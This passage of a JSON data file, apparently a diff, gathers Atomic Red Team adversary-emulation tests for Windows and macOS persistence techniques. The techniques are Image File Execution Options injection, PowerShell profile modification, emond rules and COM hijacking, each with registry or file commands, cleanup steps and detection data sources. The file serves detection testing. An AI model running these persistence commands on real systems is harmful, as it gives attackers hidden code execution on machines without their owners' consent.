Triggered Execution: Image File Execution Options Injection" + }, + { + "command": "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe\" /v GlobalFlag /t REG_DWORD /d 512\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\" /v ReportingMode /t REG_DWORD /d 1\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\" /v MonitorProcess /d \"#{payload_binary}\"\n", + "source": "atomics/T1546.012/T1546.012.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Image File Execution Options Injection" + }, + { + "command": "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\#{target_binary}\" /v GlobalFlag /t REG_DWORD /d 512\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{target_binary}\" /v ReportingMode /t REG_DWORD /d 1\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{target_binary}\" /v MonitorProcess /d \"C:\\Windows\\System32\\cmd.exe\"\n", + "source": "atomics/T1546.012/T1546.012.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Image File Execution Options Injection" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1546.012", + "display_name": "Event Triggered Execution: Image File Execution Options Injection", + "atomic_tests": [ + { + "name": "IFEO Add Debugger", + "auto_generated_guid": "fdda2626-5234-4c90-b163-60849a24c0b8", + "description": "Leverage Global Flags Settings\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "target_binary": { + "description": "Binary To Attach To", + "type": "Path", + "default": "calc.exe" + }, + "payload_binary": { + "description": "Binary To Execute", + "type": "Path", + "default": "C:\\Windows\\System32\\cmd.exe" + } + }, + "executor": { + "command": "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows 
NT\\CurrentVersion\\Image File Execution Options\\#{target_binary}\" /v Debugger /d \"#{payload_binary}\"\n", + "cleanup_command": "reg delete \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\#{target_binary}\" /v Debugger /f >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "IFEO Global Flags", + "auto_generated_guid": "46b1f278-c8ee-4aa5-acce-65e77b11f3c1", + "description": "Leverage Global Flags Settings\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "target_binary": { + "description": "Binary To Attach To", + "type": "Path", + "default": "notepad.exe" + }, + "payload_binary": { + "description": "Binary To Execute", + "type": "Path", + "default": "C:\\Windows\\System32\\cmd.exe" + } + }, + "executor": { + "command": "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\#{target_binary}\" /v GlobalFlag /t REG_DWORD /d 512\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{target_binary}\" /v ReportingMode /t REG_DWORD /d 1\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{target_binary}\" /v MonitorProcess /d \"#{payload_binary}\"\n", + "cleanup_command": "reg delete \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\#{target_binary}\" /v GlobalFlag /f >nul 2>&1\nreg delete \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{target_binary}\" /v ReportingMode /f >nul 2>&1\nreg delete \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{target_binary}\" /v MonitorProcess /f >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one 
thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": 
"process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface 
and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1546.013", + "command_list": [ + "Add-Content #{ps_profile} -Value \"\"\nAdd-Content #{ps_profile} -Value \"Start-Process calc.exe\"\npowershell -Command exit\n", + "Add-Content $profile -Value \"\"\nAdd-Content $profile -Value \"Start-Process #{exe_path}\"\npowershell -Command exit\n" + ], + "commands": [ + { + "command": "Add-Content #{ps_profile} -Value \"\"\nAdd-Content #{ps_profile} -Value \"Start-Process calc.exe\"\npowershell -Command exit\n", + "source": "atomics/T1546.013/T1546.013.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: PowerShell Profile" + }, + { + "command": "Add-Content $profile -Value \"\"\nAdd-Content $profile -Value \"Start-Process #{exe_path}\"\npowershell -Command exit\n", + "source": "atomics/T1546.013/T1546.013.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: PowerShell Profile" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1546.013", + "display_name": "Event Triggered Execution: PowerShell Profile", + "atomic_tests": [ + { + "name": "Append malicious start-process cmdlet", + "auto_generated_guid": "090e5aa5-32b6-473b-a49b-21e843a56896", + "description": "Appends a start process cmdlet to the current user's powershell profile pofile that points to a malicious executable. 
Upon execution, calc.exe will be launched.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "exe_path": { + "description": "Path the malicious executable", + "type": "Path", + "default": "calc.exe" + }, + "ps_profile": { + "description": "Powershell profile to use", + "type": "String", + "default": "$profile" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Ensure a powershell profile exists for the current user\n", + "prereq_command": "if (Test-Path #{ps_profile}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Path #{ps_profile} -Type File -Force\n" + } + ], + "executor": { + "command": "Add-Content #{ps_profile} -Value \"\"\nAdd-Content #{ps_profile} -Value \"Start-Process #{exe_path}\"\npowershell -Command exit\n", + "cleanup_command": "$oldprofile = cat $profile | Select-Object -skiplast 1\nSet-Content $profile -Value $oldprofile\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer 
programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1546.014", + "command_list": [ + "sudo cp \"PathToAtomicsFolder/T1546.014/src/T1546.014_emond.plist\" /etc/emond.d/rules/T1546.014_emond.plist\nsudo touch /private/var/db/emondClients/T1546.014\n" + ], + "commands": [ + { + "command": "sudo cp \"PathToAtomicsFolder/T1546.014/src/T1546.014_emond.plist\" /etc/emond.d/rules/T1546.014_emond.plist\nsudo touch /private/var/db/emondClients/T1546.014\n", + "source": "atomics/T1546.014/T1546.014.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Emond" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1546.014", + "display_name": "Event Triggered Execution: Emond", + "atomic_tests": [ + { + "name": "Persistance with Event Monitor - emond", + "auto_generated_guid": "23c9c127-322b-4c75-95ca-eff464906114", + "description": "Establish persistence via a rule run by OSX's emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124\n", + "supported_platforms": [ + 
"macos" + ], + "input_arguments": { + "plist": { + "description": "Path to attacker emond plist file", + "type": "Path", + "default": "PathToAtomicsFolder/T1546.014/src/T1546.014_emond.plist" + } + }, + "executor": { + "command": "sudo cp \"#{plist}\" /etc/emond.d/rules/T1546.014_emond.plist\nsudo touch /private/var/db/emondClients/T1546.014\n", + "cleanup_command": "sudo rm /etc/emond.d/rules/T1546.014_emond.plist\nsudo rm /private/var/db/emondClients/T1546.014\n", + "name": "sh", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used 
through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1546.015", + "command_list": [ + "New-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}' -Value '#{clsid_description}'\nNew-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Value #{dllpath}\nNew-ItemProperty -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Name 'ThreadingModel' -Value 'Apartment' -PropertyType \"String\"\nStart-Process -FilePath 
\"C:\\Windows\\System32\\RUNDLL32.EXE\" -ArgumentList '-sta #{clsid}'", + "New-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}' -Value '#{clsid_description}'\nNew-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Value $env:TEMP\\AtomicTest.dll\nNew-ItemProperty -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Name 'ThreadingModel' -Value '#{clsid_threading}' -PropertyType \"String\"\nStart-Process -FilePath \"C:\\Windows\\System32\\RUNDLL32.EXE\" -ArgumentList '-sta #{clsid}'", + "New-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}' -Value '#{clsid_description}'\nNew-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\\InprocServer32' -Value #{dllpath}\nNew-ItemProperty -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\\InprocServer32' -Name 'ThreadingModel' -Value '#{clsid_threading}' -PropertyType \"String\"\nStart-Process -FilePath \"C:\\Windows\\System32\\RUNDLL32.EXE\" -ArgumentList '-sta {B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}'", + "New-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}' -Value 'MSAA AccPropServices'\nNew-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Value #{dllpath}\nNew-ItemProperty -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Name 'ThreadingModel' -Value '#{clsid_threading}' -PropertyType \"String\"\nStart-Process -FilePath \"C:\\Windows\\System32\\RUNDLL32.EXE\" -ArgumentList '-sta #{clsid}'", + "$o= [activator]::CreateInstance([type]::GetTypeFromCLSID(\"9BA05972-F6A8-11CF-A442-00A0C90A8F39\"))\n$item = $o.Item()\n$item.Document.Application.ShellExecute(\"cmd.exe\",\"/c calc.exe\",\"C:\\windows\\system32\",$null,0)\n" + ], + "commands": [ + { + "command": "New-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}' -Value '#{clsid_description}'\nNew-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Value 
#{dllpath}\nNew-ItemProperty -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Name 'ThreadingModel' -Value 'Apartment' -PropertyType \"String\"\nStart-Process -FilePath \"C:\\Windows\\System32\\RUNDLL32.EXE\" -ArgumentList '-sta #{clsid}'", + "source": "atomics/T1546.015/T1546.015.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Component Object Model Hijacking" + }, + { + "command": "New-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}' -Value '#{clsid_description}'\nNew-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Value $env:TEMP\\AtomicTest.dll\nNew-ItemProperty -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Name 'ThreadingModel' -Value '#{clsid_threading}' -PropertyType \"String\"\nStart-Process -FilePath \"C:\\Windows\\System32\\RUNDLL32.EXE\" -ArgumentList '-sta #{clsid}'", + "source": "atomics/T1546.015/T1546.015.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Component Object Model Hijacking" + }, + { + "command": "New-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}' -Value '#{clsid_description}'\nNew-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\\InprocServer32' -Value #{dllpath}\nNew-ItemProperty -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\\InprocServer32' -Name 'ThreadingModel' -Value '#{clsid_threading}' -PropertyType \"String\"\nStart-Process -FilePath \"C:\\Windows\\System32\\RUNDLL32.EXE\" -ArgumentList '-sta {B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}'", + "source": "atomics/T1546.015/T1546.015.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Component Object Model Hijacking" + }, + { + "command": "New-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}' -Value 'MSAA AccPropServices'\nNew-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Value #{dllpath}\nNew-ItemProperty -Path 
'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Name 'ThreadingModel' -Value '#{clsid_threading}' -PropertyType \"String\"\nStart-Process -FilePath \"C:\\Windows\\System32\\RUNDLL32.EXE\" -ArgumentList '-sta #{clsid}'", + "source": "atomics/T1546.015/T1546.015.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Component Object Model Hijacking" + }, + { + "command": "$o= [activator]::CreateInstance([type]::GetTypeFromCLSID(\"9BA05972-F6A8-11CF-A442-00A0C90A8F39\"))\n$item = $o.Item()\n$item.Document.Application.ShellExecute(\"cmd.exe\",\"/c calc.exe\",\"C:\\windows\\system32\",$null,0)\n", + "source": "atomics/T1546.015/T1546.015.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Component Object Model Hijacking" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1546.015", + "display_name": "Event Triggered Execution: Component Object Model Hijacking", + "atomic_tests": [ + { + "name": "COM Hijacking - InprocServer32", + "auto_generated_guid": "48117158-d7be-441b-bc6a-d9e36e47b52b", + "description": "This test uses PowerShell to hijack a reference to a Component Object Model by creating registry values under InprocServer32 key in the HKCU hive then calling the Class ID to be executed via rundll32.exe.\n\nReference: https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "clsid_threading": { + "description": "Threading Model", + "type": "string", + "default": "Apartment" + }, + "dllpath": { + "description": "Path to the DLL.", + "type": "String", + "default": "$env:TEMP\\AtomicTest.dll" + }, + "clsid": { + "description": "Class ID to hijack.", + "type": "string", + "default": "{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}" + }, + "clsid_description": { + "description": "Description for CLSID", + "type": "string", + "default": "MSAA AccPropServices" + } + }, + "dependency_executor_name": "powershell", + 
"dependencies": [ + { + "description": "DLL For testing", + "prereq_command": "if (Test-Path #{dllpath}) {exit 0} else {exit 1}", + "get_prereq_command": "Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/AtomicTest.dll\" -OutFile \"#{dllpath}\"" + } + ], + "executor": { + "command": "New-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}' -Value '#{clsid_description}'\nNew-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Value #{dllpath}\nNew-ItemProperty -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Name 'ThreadingModel' -Value '#{clsid_threading}' -PropertyType \"String\"\nStart-Process -FilePath \"C:\\Windows\\System32\\RUNDLL32.EXE\" -ArgumentList '-sta #{clsid}'", + "cleanup_command": "Remove-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}' -Recurse -ErrorAction Ignore", + "name": "powershell" + } + }, + { + "name": "Powershell Execute COM Object", + "auto_generated_guid": "752191b1-7c71-445c-9dbe-21bb031b18eb", + "description": "Use the PowerShell to execute COM CLSID object.\nReference: https://pentestlab.blog/2020/05/20/persistence-com-hijacking/", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$o= [activator]::CreateInstance([type]::GetTypeFromCLSID(\"9BA05972-F6A8-11CF-A442-00A0C90A8F39\"))\n$item = $o.Item()\n$item.Document.Application.ShellExecute(\"cmd.exe\",\"/c calc.exe\",\"C:\\windows\\system32\",$null,0)\n", + "cleanup_command": "Get-Process -Name \"*calc\" | Stop-Process\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": 
"user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system 
components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of 
